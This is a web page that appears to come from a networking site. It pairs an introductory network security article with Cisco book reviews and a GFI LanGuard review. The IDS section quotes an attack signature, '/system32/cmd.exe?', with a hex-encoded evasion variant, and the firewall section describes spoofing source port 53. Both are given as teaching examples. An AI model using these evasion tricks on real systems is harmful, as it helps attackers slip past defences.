By far the most common security measure these days is a firewall. A lot of confusion surrounds the concept of a firewall, but it can basically be defined as any perimiter device that permits or denies traffic based on a set of rules configured by the administrator. Thus a firewall may be as simple as a router with access-lists, or as complex as a set of modules distributed through the network controlled from one central location.

The firewall protects everything 'behind' it from everything in front of it. Usually the 'front' of the firewall is its Internet facing side, and the 'behind' is the internal network. The way firewalls are designed to suit different types of networks is called the firewall topology.

Here is the link to a detailed explanation of different firewall topologies :Firewall.cx Firewall Topologies

You also get what are known as 'personal firewalls' such as Zonealarm, Sygate Personal Firewall , Tiny Personal Firewall , Symantec Endpoint Security etc.

These are packages that are meant for individual desktops and are fairly easy to use. The first thing they do is make the machine invisible to pings and other network probes. Most of them also let you choose what programs are allowed to access the Internet, therefore you can allow your browser and mail client, but if you see some suspicious program trying to access the network, you can disallow it. This is a form of 'egress filtering' or outbound traffic filtering and provides very good protection against trojan horse programs and worms.

However firewalls are no cure all solution to network security woes. A firewall is only as good as its rule set and there are many ways an attacker can find common misconfigurations and errors in the rules. For example, say the firewall blocks all traffic except traffic originating from port 53 (DNS) so that everyone can resolve names, the attacker could then use this rule to his advantage. By changing the source port of his attack or scan to port 53, the firewall will allow all of his traffic through because it assumes it is DNS traffic.

Bypassing firewalls is a whole study in itself and one which is very interesting especially to those with a passion for networking as it normally involves misusing the way TCP and IP are supposed to work. That said, firewalls today are becoming very sophisticated and a well installed firewall can severely thwart a would-be attackers plans.

It is important to remember the firewall does not look into the data section of the packet, thus if you have a webserver that is vulnerable to a CGI exploit and the firewall is set to allow traffic to it, there is no way the firewall can stop an attacker from attacking the webserver because it does not look at the data inside the packet. This would be the job of an intrusion detection system (covered further on).

Anti-Virus Systems

Everyone is familiar with the desktop version of anti virus packages like Norton Antivirus and Mcafee. The way these operate is fairly simple -- when researchers find a new virus, they figure out some unique characteristic it has (maybe a registry key it creates or a file it replaces) and out of this they write the virus 'signature'.

The whole load of signatures that your antivirus scans for what is known as the virus 'definitions'. This is the reason why keeping your virus definitions up-to-date is very important. Many anti-virus packages have an auto-update feature for you to download the latest definitions. The scanning ability of your software is only as good as the date of your definitions. In the enterprise, it is very common for admins to install anti-virus software on all machines, but there is no policy for regular update of the definitions. This is meaningless protection and serves only to provide a false sense of security.

With the recent spread of email viruses, anti-virus software at the MTA (Mail Transfer Agent , also known as the 'mail server') is becoming increasingly popular. The mail server will automatically scan any email it recieves for viruses and quarantine the infections. The idea is that since all mail passes through the MTA, this is the logical point to scan for viruses. Given that most mail servers have a permanent connection to the Internet, they can regularly download the latest definitions. On the downside, these can be evaded quite simply. If you zip up the infected file or trojan, or encrypt it, the anti-virus system may not be able to scan it.

End users must be taught how to respond to anti virus alerts. This is especially true in the enterprise -- an attacker doesn't need to try and bypass your fortress like firewall if all he has to do is email trojans to a lot of people in the company. It just takes one uninformed user to open the infected package and he will have a backdoor to the internal network.

It is advisable that the IT department gives a brief seminar on how to handle email from untrusted sources and how to deal with attachments. These are very common attack vectors simply because you may harden a computer system as much as you like, but the weak point still remains the user who operates it. As crackers say 'The human is the path of least resistance into the network'.

Intrusion Detection Systems

IDS's have become the 'next big thing' the way firewalls were some time ago. There are bascially two types of Intrusion Detection Systems :

• Host based IDS
• Network based IDS

Host based IDS - These are installed on a particular important machine (usually a server or some important target) and are tasked with making sure that the system state matches a particular set baseline. For example, the popular file-integrity checker Tripwire -- this program is run on the target machine just after it has been installed. It creates a database of file signatures for the system and regularly checks the current system files against their known 'safe' signatures. If a file has been changed, the administrator is alerted. This works very well as most attackers will replace a common system file with a trojaned version to give them backdoor access.

Network based IDS - These are more popular and quite easy to install. Basically they consist of a normal network sniffer running in promiscuous mode (in this mode the network card picks up all traffic even if its not meant for it). The sniffer is attached to a database of known attack signatures and the IDS analyses each packet that it picks up to check for known attacks. For example a common web attack might contain the string '/system32/cmd.exe?' in the URL. The IDS will have a match for this in the database and will alert the administrator.

Newer IDS' support active prevention of attacks - instead of just alerting an administrator, the IDS can dynamically update the firewall rules to disallow traffic from the attacking IP address for some amount of time. Or the IDS can use 'session sniping' to fool both sides of the connection into closing down so that the attack cannot be completed.

Unfortunately IDS systems generate a lot of false positives (a false positive is basically a false alarm, where the IDS sees legitimate traffic and for some reason matches it against an attack pattern) this tempts a lot of administrators into turning them off or even worse -- not bothering to read the logs. This may result in an actual attack being missed.

IDS evasion is also not all that difficult for an experienced attacker. The signature is based on some unique feature of the attack, and so the attacker can modify the attack so that the signature is not matched. For example, the above attack string '/system32/cmd.exe?' could be rewritten in hexadecimal to look something like the following:

'2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f'

Which might be totally missed by the IDS. Furthermore, an attacker could split the attack into many packets by fragmenting the packets. This means that each packet would only contain a small part of the attack and the signature would not match. Even if the IDS is able to reassemble fragmented packets, this creates a time overhead and since IDS' have to run at near real-time status, they tend to drop packets while they are processing. IDS evasion is a topic for a paper on its own.

The advantage of a network based IDS is that it is very difficult for an attacker to detect. The IDS itself does not need to generate any traffic, and in fact many of them have a broken TCP/IP stack so they don't have an IP address. Thus the attacker does not know whether the network segment is being monitored or not.

Patching and Updating

It is embarassing and sad that this has to be listed as a security measure. Despite being one of the most effective ways to stop an attack, there is a tremendously laid back attitude to regulary patching systems. There is no excuse for not doing this, and yet the level of patching remains woefully inadequate. Take for example the MSblaster worm that spread havoc recently. The exploit was known almost a month in advance, and a patch had been released, still millions of users and businesses were infected. While admins know that having to patch 500 machines is a laborious task, the way I look at it is I would rather be updating my systems on a regular basis than waiting for disaster to strike and then running around trying to patch and clean up those 500 systems.

For the home user, its a simple matter of running the automatic update software that every worthwhile OS comes with. In the enterprise there is no 'easy' way to patch large numbers of machines, but there are patch deployment mechanisms that take a lot of the burden away. Frankly, it is part of an admin's job to do this, and when a network is horribly fouled up by the latest worm it just means someone, somewhere didn't do his job well enough.

Click here to read 'Introduction to Network Security - Part 2'

  • Hits: 78271

The VIRL Book – A Guide to Cisco’s Virtual Internet Routing Lab (Cisco Lab)

cisco-virl-book-guide-to-cisco-virtual-internet-routing-lab-1Cisco’s Virtual Internet Routing Lab (VIRL) is a network simulation tool developed by Cisco that allows engineers, certification candidates and network architects to create their own Cisco Lab using the latest Cisco IOS devices such as Routers, Catalyst or Nexus switches, ASA Firewall appliances and more.

Read Jack Wang's Introduction to Cisco VIRL article to find out more information about the product

Being a fairly new but extremely promising product it’s quickly becoming the standard tool for Cisco Lab simulations. Managing and operating Cisco VIRL might have its challenges, especially for those new to the virtualization world, but one of the biggest problems has been the lack of dedicated online resources for VIRL management leaving a lot of unanswered questions on how to use VIRL for different types of simulations, how to build topologies, how to fine tune them etc.

The recent publication of “The VIRL Book’ by Jack Wang has changed the game for VIRL users. Tasks outlined above plus a lot more are now becoming easier to handle, helping users manage their VIRL server in an effective and easy to understand way.

The introduction to VIRL has been well crafted by Jack as he addressed each and every aspect of VIRL, why one should opt for VIRL, what VIRL can offer and how it different from other simulation tools.

This unique title addresses all possible aspects of VIRL and has been written to satisfy even the most demanding users seeking to create complex network simulations. Key topics covered include:

  • Planning the VIRL Installation
  • Installing VIRL
  • Creating your first simulation
  • Basic operation & best practices,
  • Understanding the anatomy of VIRL
  • External Connectivity to the world
  • Advanced features
  • Use VIRL for certifications
  • Running 3rd party virtual machines
  • Sample Network Topologies

The Planning the VIRL Installation section walks through the various VIRL installation options, be it a virtual machine, bare metal installation or on the cloud, what kind of hardware suits the VIRL installation. This makes life easier for VIRL users to ensure they are planning well and selecting the right hardware for their VIRL installation.

Understanding the Cisco VIRL work-flow

Figure 1. Understanding the Cisco VIRL work-flow

The Installing VIRL section is quite engaging as Jack walks through the installation of VIRL on various virtual platforms such as VMware vSphere ESXI, VMWare Fusion, VMWare Workstation, Bare-Metal and on the cloud. All these installations are described simple steps and with great illustrations. The troubleshooting part happens to be the cream of this section as it dives into small details such as bios settings and more, proving how attentive the author is to simplifying troubleshooting.

The Creating your first simulation section is a very helpful section as it goes though in depth about how to create a simulation, comparison of Design mode and Simulation mode, generating initial configurations etc. This section really helped us to understand VIRL in depth and especially how to create a simulation with auto configurations.

The External connectivity to the world section helps the user open up to a new world of virtualization and lab simulations. Jack really mastered this section and simplified the concepts of FLAT network and SNAT network while at the same time dealing with issues like how to add 3rd party virtual machines into VIRL. The Palo Alto Firewall integration happens to be our favorite.

To summarize, this title is a must guide for all Cisco VIRL users as it deals with every aspect of VIRL and we believe this not only simplifies the use of the product but also helps users understand how far they can go with it. Jack’s hard work and insights are visible in every section of the book and we believe it’s not an easy task to come out with such a great title. We certainly congratulate Jack. This is a title that should not be missing from any Cisco VIRL user’s library.

  • Hits: 16912

Cisco Press Review for “Cisco Firepower and Advanced Malware Protection Live Lessons” Video Series

Title:              Cisco Firepower & Advanced Malware Protection Live Lessons
Authors:        Omar Santos
ISBN-10:       0-13-446874-0
Publisher:     Cisco Press
Published:    June 22, 2016
Edition:         1st Edition
Language:    English

cisco-firepower-and-advanced-malware-protection-live-lessons-1The “Cisco Firepower and Advanced Malware Protection Live Lessons” video series by Omar Santos is the icing on the cake for someone who wants to start their journey of Cisco Next-Generation Network Security. This video series contains eight lessons on the following topics:

Lesson 1: Fundamentals of Cisco Next-Generation Network Security

Lesson 2: Introduction and Design of Cisco ASA with FirePOWER Services

Lesson 3: Configuring Cisco ASA with FirePOWER Services

Lesson 4: Cisco AMP for Networks

Lesson 5: Cisco AMP for Endpoints

Lesson 6: Cisco AMP for Content Security

Lesson 7: Configuring and Troubleshooting the Cisco Next-Generation IPS Appliances

Lesson 8: Firepower Management Center

Lesson 1 deals with the fundamentals of Cisco Next-Generation Network Security products, like security threats, Cisco ASA Next-Generation Firewalls, FirePOWER Modules, Next-Generation Intrusion Prevention Systems, Advanced Malware Protection (AMP), Email Security, Web Security, Cisco ISE, Cisco Meraki Cloud Solutions and much more. Omar Santos has done an exceptional job creating short videos, which are a maximum of 12 minutes, he really built up the series with a very informative introduction dealing with the security threats the industry is currently facing, the emergence of Internet of Things (IOT) and its impact and the challenges of detecting threats.

Lesson 2 deals with the design aspects of the ASA FirePOWER Service module, how it can be deployed in production networks, how High-Availability (HA) works, how ASA FirePOWER services can be deployed at the Internet Edge and the VPN scenarios it supports. The modules in this lesson are very brief and provide an overview. If someone were looking for in-depth information they must refer to Cisco documentation.  

Lesson 3 is the most important lesson of the series as it deals with the initial setup of the Cisco ASA FirePOWER Module in Cisco ASA 5585-X and Cisco ASA 5500-X appliances, also Omar demonstrates how Cisco ASA redirects traffic to the Cisco ASA FirePOWER module and he concludes the lesson with basic troubleshooting steps.

Lessons 4, 5 and 6 are dedicated to Cisco AMP for networks, endpoints and content security. Omar walks through an introduction to AMP, each lesson deals with various options, it’s a good overview of AMP and he’s done a commendable job keeping it flowing smoothly. Cisco AMP for endpoint is quite interesting as Omar articulates the info in a much easier way and the demonstrations are good to watch.

The best part of this video series is the Lesson that deals with the configuration of Cisco ASA with FirePOWER services, in a very brief way Omar shows the necessary steps for the successful deployment in the Cisco ASA 5585-X and Cisco ASA 5500-X platform.

The great thing about Cisco Press is that it ensures one doesn’t need to hunt for reference or study materials, it always has very informative products in the form of videos and books. You can download these videos and watch them at your own pace.

To conclude, the video series is really good to watch as it deals with various topics of Cisco Next-Generation Security products in less than 13 minutes, the language used is quite simple and easy to understand, however, this video series could do with more live demonstrations especially a demonstration on how to reimage the ASA appliances to install the Cisco FirePOWER module.

This is a highly recommended product especially for engineers interested in better understanding how Cisco’s Next-Generation security products operate and more specifically the Cisco FirePOWER services, Cisco AMP and advanced threat detection & protection.

  • Hits: 10655

Cisco CCNP Routing & Switching v2.0 – Official Cert Guide Library Review (Route 300-101, Switch 300-115 & Tshoot 300-135)

Title:          Cisco CCNP Routing & Switching v2.0 – Official Cert Guide Library
Authors:    Kevin Wallace, David Hucaby, Raymond Lacoste    
ISBN-13:    978-1-58720-663-4
Publisher:  Cisco Press
Published:  December 23rd, 2014
Edition:      1st Edition
Language:  English

Reviewer: Chris Partsenidis

star-5  

CCNP Routing and Switching - Library V2 ISBN 0-13-384596-6The Cisco CCNP Routing and Switching (CCNP R&S) certification is the most popular Cisco Professional series certification at the moment, requiring candidates sit and pass three professional level exams: Route 300-101, Switch 300-115 & Tshoot 300-135.

The Cisco Press CCNP R&S v2.0 Official Cert Guide Library has been updated to reflect the latest CCNP R&S curriculum updates (2014) and is perhaps the only comprehensive study guide out there, that guarantees to help you pass all three exams on your first try, saving money, time and unwanted disappointments – and ‘no’ - this is not a sales pitch as I personally used the library for my recently acquired CCNP R&S certification!  I’ll be writing about my CCNP R&S certification path experience very soon on Firewall.cx.

The CCNP R&S v2 Library has been written by three well-known CCIE veteran engineers (Kevin Wallace, David Hucaby, Raymond Lacoste) and with the help and care of Cisco Press, they’ve managed to produce the best CCNP R&S study guide out there.   While the CCNP R&S Library is aimed for CCNP certification candidates – it can also serve as a great reference guide for those seeking to increase their knowledge on advanced networking topics, technologies and improve their troubleshooting skills.

The Cisco Press CCNP R&S v2 Library is not just a simple update to the previous study guide. Key topics for each of the three exams are now clearer than ever, with plentiful examples, great diagrams, finer presentation and analysis.

The CCNP Route exam (300-101) emphasizes on a number of technologies and features that are also reflected in the ROUTE study guide book. IPv6 (dual-stack), EIGRP IPv6 & OSPF IPv6, RIPng (RIP IPv6), NAT (IPv4 & IPv6), VPN Concepts (DMVPN and Easy VPN), are amongst the list of ‘hot’ topics covered in ROUTE book. Similarly the CCNP Switch exam (300-115) emphasizes, amongst other topics, on Cisco StackWise, Virtual Switching Service (VSS) and Advanced Spanning Tree Protocol implementations – all of which are covered extensively in the SWITCH book.

Each of the three books is accompanied by a CD, containing over 200 practice questions (per CD) that are designed to help prepare the candidate for the real exam. Additional material on each CD includes memory table exercises and answer keys, a generous amount of videos, plus a study planner tool – that’s pretty much everything you’ll need for a successful preparation and achieving the ultimate goal: passing each exam.

Using the CCNP R&S v2 Library to help me prepare for each CCNP exam was the best thing I did after making the decision to pursue the CCNP certification. Now it’s proudly sitting amongst my other study guides and used occasionally when I need a refresh on complex networking topics.

  • Hits: 16368

GFI’s LANGUARD Update – The Most Trusted Patch Management Tool & Vulnerability Scanner Just Got Better!

gfi-languardGFI’s LanGuard is one of the world’s most popular and trusted patch management & vulnerability scanner products designed to effectively monitor and manage networks of any size. IT Administrators, Network Engineers and IT Managers who have worked with Languard would surely agree that the above statement is no exaggeration.

Readers who haven’t heard or worked with GFI’s LanGuard product should definitely visit our LanGuard 2014 product review and read about the features this unique network security product offers and download their free copy.

GFI recently released an update to LanGuard, taking the product to a whole new level by providing new key-features that have caught us by surprise.

Following is a short list of them:

  • Mobile device scanning:  customers can audit mobile devices that connect to Office 365, Google Apps and Apple Profile Manager.
  • Expanded vulnerability assessment for network devices: GFI LanGuard 2014 R2 offers vulnerability assessment of routers, printers and switches from the following vendors: Cisco, 3Com, Dell, SonicWALL, Juniper Networks, NETGEAR, Nortel, Alcatel, IBM and Linksys. 
  • CIPA compliance reports: CIPA compliance reports: additional reporting to ensure US schools and libraries adhere to the Children’s Internet Protection Act (CIPA). GFI LanGuard has now dedicated compliance reports for 11 security regulations and standards, including PCI DSS, HIPAA, SOX and PSN CoCo.
  • Support for Fedora: Fedora is 7th Linux distribution supported by LanGuard for automatic patch management
  • Chinese Localization: GFI LanGuard 2014 R2 is now also available in Chinese Traditional and Simplified versions.

One of the features we loved was the incredible support of Cisco products. With its latest release, GFI LanGuard supports over 1500 different Cisco products ranging from routers (including the newer ISR Gen 2), Catalyst switches (Layer2 & Layer3 switches), Cisco Nexus switches, Cisco Firewalls (PIX & ASA Series), VPN Gateways, Wireless Access points, IPS & IDS Sensors, Voice Gateways and much more!

  • Hits: 11171

CCIE Collaboration Quick Reference Review

Title:              CCIE Collaboration Quick Reference
Authors:        Akhil Behl
ASIN:             B00KDIM9FI
Publisher:      Cisco Press
Published:     May 16, 2014
Edition:         1st Edition
Language:     English

Reviewer: Arani Mukherjee

star-5  

0-13-384596-6This ebook has been designed for a specific target audience, as the title of the book suggests, hence it cannot be alleged that it is not suitable for all levels of Cisco expertise. Furthermore, since it is a quick reference, there is no scope for something like poetic licence. As a quick reference, it achieves the two key aims:

1) Provide precise information
2) Do it in a structured format

And eliminate any complexity or ambiguity on the subject matter by adhering to these two key aims.

Readers of this review have to bear in mind that the review is not about the content/subject matter and its technical accuracy. This has already been achieved by the technical reviewer, as mentioned in the formative sections of the ebook. This review is all about how effectively the ebook manages to deliver key information to its users.

So, to follow up on that dictum, it would be wise to scan through how the material has been laid out.

It revolves around the Cisco Unified Communication (UC) workspace service infrastructure and explains what it stands for and how it delivers what it promises. So the first few chapters are all about the deployment of this service. Quality of Service (QoS) follows deployment. This chapter is dedicated entirely towards ensuring the network infrastructure will provide the classification of policies and scheduling for multiple network traffic classes.

The next chapter is Telephony Standards and Protocols. This chapter talks about the various voice based protocols and their respective criteria. These include analog, digital and fax communication protocols.

From this point onwards the reference material concentrates purely on the Cisco Unified Communication platform. It discusses the relevant subsections of CUCM in the following line-up:

  • Cisco Unified Communications Manager
  • Cisco Unified Communications Security
  • Cisco Unity Connection
  • Cisco Unified Instant Messaging and Presence
  • Cisco Unified Contact Centre Express
  • Cisco IOS Unified Communications Applications &
  • Cisco Collaboration Network Management

In conclusion, what we need to prove or disprove are the key aims of a quick reference:

Does it provide precise information? - The answer is Yes. It does so due to the virtue that it is a reference guide. Information has to be precise as it would be used in situations where credibility or validity won't be questioned.

Does it do the above in a structured manner? - The answer is Yes. The layout of the chapters in its current form helps to achieve that. The trajectory of the discussion through the material ensures it as well.

Does it eliminate any complexity and ambiguity? - The answer again is Yes. This is a technical reference material and not a philosophical debate penned down for the benefit of its readers. The approach of the author is very simplistic. It follows the natural order of events from understanding the concept, deploying the technology and ensuring quality of the services, to managing the technology to provide a robust efficient workspace environment.

In addition to the above proof it needs to be mentioned that, since it is an eBook, users will find it easy to use it from various mobile platforms like tablets or smart phones. It wouldn’t be easy to carry around a 315 page reference guide, even if it was printed on both sides of the paper!

For its target audience, this eBook will live up to its readers expectations and is highly recommended for anyone pursuing the CCIE Collaboration or CCNP Voice certification.

  • Hits: 15125

CCIE Collaboration Quick Reference Exam Guide

Title:             CCIE Collaboration Quick Reference
Authors:        Akhil Behl
ISBN-10(13): 0-13-384596-6
Publisher:      Cisco Press
Published:      May  2014
Edition:          1st Edition
Language:      English

star-5

CCIE Collaboration Quick ReferenceThis title addresses the current CCIE Collaboration exam from both written and lab exam perspective. The title helps CCIE aspirants to achieve CCIE Collaboration certification and excel in their professional career. The ebook is now available for pre-order and is scheduled for release on 16 May 2014.
 
Here’s the excerpt from Cisco Press website:

CCIE Collaboration Quick Reference provides you with detailed information, highlighting the key topics on the latest CCIE Collaboration v1.0 exam. This fact-filled Quick Reference allows you to get all-important information at a glance, helping you to focus your study on areas of weakness and to enhance memory retention of important concepts. With this book as your guide, you will review and reinforce your knowledge of and experience with collaboration solutions integration and operation, configuration, and troubleshooting in complex networks. You will also review the challenges of video, mobility, and presence as the foundation for workplace collaboration solutions. Topics covered include Cisco collaboration infrastructure, telephony standards and protocols, Cisco Unified Communications Manager (CUCM), Cisco IOS UC applications and features, Quality of Service and Security in Cisco collaboration solutions, Cisco Unity Connection, Cisco Unified Contact Center Express, and Cisco Unified IM and Presence.

This book provides a comprehensive final review for candidates taking the CCIE Collaboration v1.0 exam. It steps through exam objectives one-by-one, providing concise and accurate review for all topics. Using this book, exam candidates will be able to easily and effectively review test objectives without having to wade through numerous books and documents for relevant content for final review.

Table of Contents

Chapter 1 Cisco Collaboration Infrastructure
Chapter 2 Understanding Quality of Service
Chapter 3 Telephony Standards and Protocols
Chapter 4 Cisco Unified Communications Manager
Chapter 5 Cisco Unified Communications Security
Chapter 6 Cisco Unity Connection
Chapter 7 Cisco Unified IM Presence
Chapter 8 Cisco Unified Contact Center Express
Chapter 9 Cisco IOS UC Applications
Chapter 10 Cisco Collaboration Network Management

 If you are considering sitting for your CCIE Collaboration exam, then this is perhaps one of the most valuable resources you'll need to get your hands on!
  • Hits: 12707

Network Security Product Review: GFI LanGuard 2014 - The Ultimate Tool for Admins and IT Managers

Review by Arani Mukherjee

Network Security GFI Languard 2014 100% ScoreFor a company’s IT department, it is essential to manage and monitor all assets with a high level of effectiveness, efficiency and transparency for users. Centralised management software becomes a crucial tool for the IT department to ensure that all assets are performing at their utmost efficiency, and that they are safeguarded from any anomalies, be it a virus attack, security holes created by unpatched softwares or even the OS.

GFI LanGuard is one such software that promises to provide a consolidated platform from which software, network and security management can be performed, remotely, on all assets under its umbrella. Review of LanGuard Version 2011 was published previously on Firewall.cx by our esteemed colleagues Alan Drury and John Watters. Here are our observations on the latest version of LanGuard 2014. This is something we would call a perspective from a fresh pair of eyes.

Installation

The installation phase has been made seamless by GFI. There are no major changes from the previous version. Worth noting is that near the end of the installation you will be asked to point towards an existing instance of SQL Server, or install one. This might prolong the entire process but, overall, a very tidy installation package. Our personal opinion is to ensure the hardware server has a decent amount of memory and CPU speed to provide the sheer number crunching needs of LanGuard.

First Look: The Dashboard

Once the installation is complete, LanGuard is ready to roll without the need for any OS restarts or a hardware reboot. For the purpose of this review two computers, one running Windows 7 and the other running Linux Ubuntu, were used. The Dashboard is the first main screen the user will encounter:

review-languard-2014-1Main Screen (Click to enlarge)

LanGuard will be able to pick up the machines it needs to monitor from the workgroup it belongs to. Obviously it does show a lot of information at one glance. The section of Common Tasks (lower left corner) is very useful for performing repetitive actions like triggering scans, or even adding computers. Adding computers can be done by looking into the existing domain, by computer name, or even by its IP address. Once LanGuard identifies the computer, and knows more about it from scan results, it allocates the correct workgroup under the Entire Network section.

Below is what the Dashboard looked like for a single device or machine:

review-languard-2014-2(Click to enlarge)

The Dashboard has several sub categories, but we’ll talk about them once we finish discussing the Scan option.

Scan Option

The purpose of this option is to perform the management scan of the assets that need to be monitored via LanGuard. Once the asset is selected LanGuard will perform various types of scans, called audit operations. Each audit operation corresponds to an output of information under several sections for that device. Information ranges from hardware type, software installed, ports being used, patch information etc.

The following screenshot displays a scan in progress on such a device:

review-languard-2014-3LanGuard Scan Option (Click to enlarge)

The progress of the Scan is shown at the top. The bottom section, with multiple tabs, lets the user know the various types of audit operations that are being handled. If any errors occur they appear in the Errors tab. This is very useful in terms of finding out if there are any latent issues with any device that might hamper LanGuard’s functions.

The Dashboard – Computers Tab

Once the Scan is complete, the Dashboard becomes more useful in terms of finding information about the devices. The Computers Tab is a list view of all such devices. The following screenshot shows how the various sections can be used to group and order the devices on the list:

review-languard-2014-4LanGuard Computer Tab (Click to enlarge)

Notice that just above the header named ‘Computer Information’, it asks the user to drag any column header to group the computers using that column. This is a unique feature. This goes to show that LanGuard has given the control of visibility to the user, instead of providing stock views. As well, every column header can be used to set filters. This means the user has multiple viewing options that can be adjusted depending on the need of the hour.

The Dashboard – History Tab

This tab is a listed historical view of all actions that have been taken on a given device. Every device’s functional history is shown, based on which computer has been selected on the left ‘Entire Network’ section. This is like an audit trail that can be used to track the functional progression of the computer. The following screenshot displays the historical data generated on the Windows 7 desktop that was used for our testing.

review-languard-2014-5LanGuard History Tab (Click to enlarge)

Information is sectioned in terms of date, and then further sectioned in terms of time stamps. We found the level of reporting to be very useful and easy to read.

The Dashboard – Vulnerabilities

This is perhaps one of the most important tabs under the Dashboard. At once glance you can find out the main weakness of the machine scanned. All such vulnerabilities are sub divided into Types, based on their level of criticality. If the user selects a type, the actual list of issues comes up in the right hand panel.

Now if the user selects a single vulnerability, a clearer description appears at the bottom. LanGuard not only tells you about the weakness, it also provides valid recommendations on how to deal with it. Here’s a view of our test PC’s desktop’s weaknesses. Thanks to LanGuard, all of them were resolved!

review-languard-2014-6LanGuard Vulnerabilities Tab (Click to enlarge)

The Dashboard – Patches

Like the Vulnerabilities tab, the Patches tab shows the user the software updates and patches that are lacking on the target machine. Below is a screenshot demonstrating this:

review-languard-2014-7LanGuard Patches Tab (Click to enlarge)

Worth noting is the list of action buttons on the panel at the bottom right corner. The user has the option of acknowledging the patch issue or set it to ‘ignore’. The ‘Remediate’ option will be discussed at a later date.

The Dashboard – Ports Tab

The function of the Ports tab is to display which ports are open on the target machine. They are smarty divided into TCP and UDP ports. When the user selects either of the two divisions, the ports are listed in the right panel. Selecting a port displays the process which is using that port, along with the process path. From a network management point of view, with network security in mind, this is an excellent feature to have.

review-languard-2014-8LanGuard Ports Tab (Click to enlarge)

The Dashboard – Software Tab

This tab is a good representation of how well LanGuard scans the target machine and brings out information about it. Any software installed, along with version and authorisation, is listed. An IT manager can use this information to reveal any unauthorised software that might be in use on company machines. This makes absolute sense when it comes to safeguarding company assets from the hazards of pirated software:

review-languard-2014-9LanGuard Software Tab (Click to enlarge)

The Dashboard – Hardware Tab

The main purpose of the Hardware tab is titular, displaying the hardware components of the machines. The information provided is very detailed and can be very useful in maintaining a framework of similar hardware for the IT Infrastructure. LanGuard is very good at obtaining detailed information about a machine and presenting it in a very orderly fashion. Here’s what LanGuard presented in terms of hardware information:

review-languard-2014-10LanGuard Hardware Tab (Click to enlarge)

The Dashboard – System Information

Obviously, LanGuard was providing user specific information along with services and shares on the machines. This shows all the processes and services running on the machines. It also shows all the various user profiles and current users logged onto the machine. It can be used to see if a user is available on a machine, the shares that are listed, and identify them as authorised or not. Same can be done for the users that reside on that machine. As always selecting the System Information List on the right hand panel would display more details on the bottom panel.

review-languard-2014-11LanGuard System Information Tab (Click to enlarge)

Remediate Option

One of the key options for LanGuard, Remediate, is there to ensure all important patches and upgrades necessary for your machines are delivered as and when required. As mentioned earlier in the Dashboard – Patches section, any upgrade or patch that is missing is listed with a Remediate option. But Remediate not only lets the user deploy patches, but it also helps in delivering bespoke software and malware protection. This is a core vital function as it ensures the security of the IT infrastructure along with its integrity. A quick look at the main screen for Remediate clearly defines its utilities:

review-languard-2014-12LanGuard Remediate Main Screen (Click to enlarge)

The level of detail provided and the ease of operation was clearly evident.

Here’s a snapshot of the Software Updates screen. The layout speaks for itself:

review-languard-2014-13LanGuard Deploy Software Updates Screen (Click to enlarge)

Obviously, the user is allowed to pick and choose which updates to deploy and which ones to shelve for the time being.

Activity Monitor Option

This is more of an audit trail of all the actions, whether manually triggered or scheduled, that have been taken by LanGuard. This helps the user to find out if any scan or search has encountered any issues. This gives a bird’s eye view of how well LanGuard is working in the background to ensure the assets are being monitored properly.

The top left panel helps the user to select which audit trail needs to be seen and, based on that, the view dynamically changes to accommodate the relevant information. Here’s what it would look like if one wanted to see the trail of Security Scans:

review-languard-2014-14LanGuard Activity Monitor Option (Click to enlarge)

Reports Option

All the aforementioned information is worth gathering if it can be presented for making commercial and technical decisions. That is where LanGuard presents us with a plethora of reporting options. The sheer volume of options was a bit overwhelming but every report has its own merits. The screen shown in the screenshot below does not even show the bottom of the reports menu, there’s a lot to scroll below as well:

review-languard-2014-15LanGuard Reports Option (Click to enlarge)

Running the Network Security Report provides a level of presentation which played with every detail, and wasn’t confusing with too much information. Here’s what it looked like:

review-languard-2014-16LanGuard Network Security Report (Click to enlarge)

The graphical report was certainly eye catching.

Configuration Option

Clearly LanGuard has not shied away from letting users having the power to tweak the software to their best advantage. Users can scan the network for devices and remotely deploy the agents which would perform the repeated scheduled scans.

review-languard-2014-17LanGuard Configuration Option (Click to enlarge)

LanGuard was unable to scan the Ubuntu box properly and refused to deploy the agent, in spite of being given the right credentials.

A check on GFI’s website for the minimum level of Linux supported showed that the Ubuntu was two versions above the requirements. The scan could recognise it as ‘Probably Unix’ and that’s the most LanGuard managed. We suspect the problem to be related with the system's firewall and security settings.

The following message appeared on the Agent Dialog box when trying to deploy it on the Linux machine: “Not Supported for this Operating System”

review-languard-2014-18Minor issues identifing our Linux workstation (Click to enlarge)

Moving on to LanGuard’s latest offering, the ability to manage mobile devices. This is a new addition to LanGuard’s arsenal. It can manage and monitor mobile devices that use an Microsoft Exchange Server for email access etc. Company smart phones and tablets can be managed using this new tool. Here’s the interface for the same purpose.

review-languard-2014-19LanGuard Managing Mobile Devices (Click to enlarge)

Utilities Option

We call it the Swiss Army Knife for network management. One of our favourite sections, it included some quick and easy way of checking network features of any devices or an IP Address. This just goes to prove that LanGuard is very well thought out piece of software. Not only does it include mission critical functions, it also provides a day to day point of mission control for the IT Manager.

We could not stop ourselves from performing a quick check on the output from the Whois option here:

review-languard-2014-21LanGuard Whois using Utilities (Click to enlarge)

The other options were pretty self-explanatory and of course very handy for a network manager.

Final Verdict

LanGuard provides an impressive set of tools. The process of adding machines, gathering information and then displaying the information is very efficient. The reporting is extremely resourceful and caters to every need possible for an IT Manager. Hoping the lack of support for Linux is an isolated incident. It has grabbed the attention of this reviewer to the point that he is willing to engage his own IT Manager and query what software his IT Department uses.

If it’s not LanGuard, there’s enough evidence here to put a case for this brilliant piece of software. LanGuard is a very good tool and should be part of an IT Manager’s or Administrator’s arsenal when it comes to managing a small to large enterprise IT Infrastructure.

 

 

 

  • Hits: 27446

Interview: Kevin Wallace CCIEx2 #7945 (Routing/Switching and Voice) & CCSI (Instructor) #20061

ccie-kevin-wallaceKevin Wallace is a well-known name in the Cisco industry. Most Cisco engineers and Cisco certification candidates know Kevin from his Cisco Press titles and the popular Video Mentor training series.  Today, Firewall.cx has the pleasure of interviewing Kevin and revealing how he managed to become one of the world's most popular CCIEs, which certification roadmap Cisco candidates should choose, which training method is best for your certification and much more.

